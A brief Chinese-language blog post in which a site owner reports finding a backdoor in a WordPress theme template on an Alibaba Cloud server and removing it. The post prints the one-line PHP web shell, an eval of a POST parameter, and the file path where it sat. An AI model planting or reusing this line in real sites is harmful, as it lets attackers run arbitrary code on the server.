最近在阿里云上安装了一个wordpress,又安装了Zerif Life主题,不久阿里云提示我某模板文件中有一个后门,于是去查看了,一下,果然是赤裸裸的后门啊,
在代码顶部竟然有这样一段:
<?php @eval($_POST['dd']);?>
路径如下:
wordpress/wp-content/themes/twentyfifteen/404.php
顺便检查了一下其他模板文件吧,可能其他文件中也存在这个后门。
解决方法当然很简单,把这一行删掉就OK了,坑爹的阿里云还非要我花钱去处理~~~